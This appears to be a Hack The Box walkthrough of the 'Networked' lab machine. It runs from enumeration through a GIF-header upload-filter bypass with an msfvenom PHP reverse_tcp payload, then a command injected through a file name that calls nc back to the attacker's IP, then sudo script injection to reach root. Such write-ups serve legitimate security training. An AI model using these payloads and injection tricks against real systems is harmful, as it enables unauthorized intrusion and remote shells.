Hello fellow hackers,,, today we are going to solve Networked from hack the box
It’s a great easy box to solve!!! , so lets get started….
I started with nmap to scan the open ports on the machine
Namp -A -v -sT 10.10.10.146
The box have two ports open :
- Port 22 running ssh service
- Port 80 running HTTP server
I checked the services if its vulnerable to public exploits and found nothing
The services are up to date .
Now let’s check the web server
After going to the web server i found a message from the admin asking to fund his project and inviting us to his pool party , sounds cool!!!
I started to enumerate the directories using gobuster
gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt dir -u https://10.10.10.146
Right away it popped out a directory called backup , sounds interesting? Let’s check it out
Inside it i found a .tar file called backp.tar after checking it out I found it a backup of the pages source code
After going to the pages I found an upload utility under upload.php
That can only accept images , going through the php code that we have of the page
It filters the uploaded photos using a white list filter
So in order to bypass it i generated a php payload using msfvenom and i saved it in a double extension file
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.92 LPORT=1995 -f raw > shell.php.jpeg
Then i upload it to the server but i got rejected again
So it’s checking the code somehow so in order to bypass i added the GIF image header at the beginning of the payload file to fool the scan GIF89a;
Then i uploaded it and it passed!!!
It gave a message saying that the file is uploaded and to refresh the gallery
The gallery is under /photos.php
I fire up my listener and went to /photos.php and refresh it , and we got a shell!!!
We are in as apache user, going to the home directory I found a directory for user guly i couldn’t read the user flag but i was able to read the check_attack.php file
And crontab.guly file
The check_attack.php file checks if the files in the upload directory containing in there name an ip, if so, it sends it to log_path then delete it using rm command
the script is set to a cronJop to run every 3 minutes
So let’s exploit it!!!!
Going to upload directory, i created a file using touch command as follows
touch '; nc 10.10.14.92 1995 -c bash'
So what will happen here is when the script run and found an ip address in my file name it will send it to log path and then execute rm command so the semicolon will inject the nc command and execute it!!!
I set my listener and waited to the script to run, after 3 minutes we have a shell for user guly !!!!
Now to the root access
After some basic enumeration
I ran sudo -l command
User guly is allowed to run sudo command with no password to changename.sh script
After running the script several times I tried to inject a command in every line of the script as follows \ /bin/bash and we popped out a root shell !!!
SMT Red Team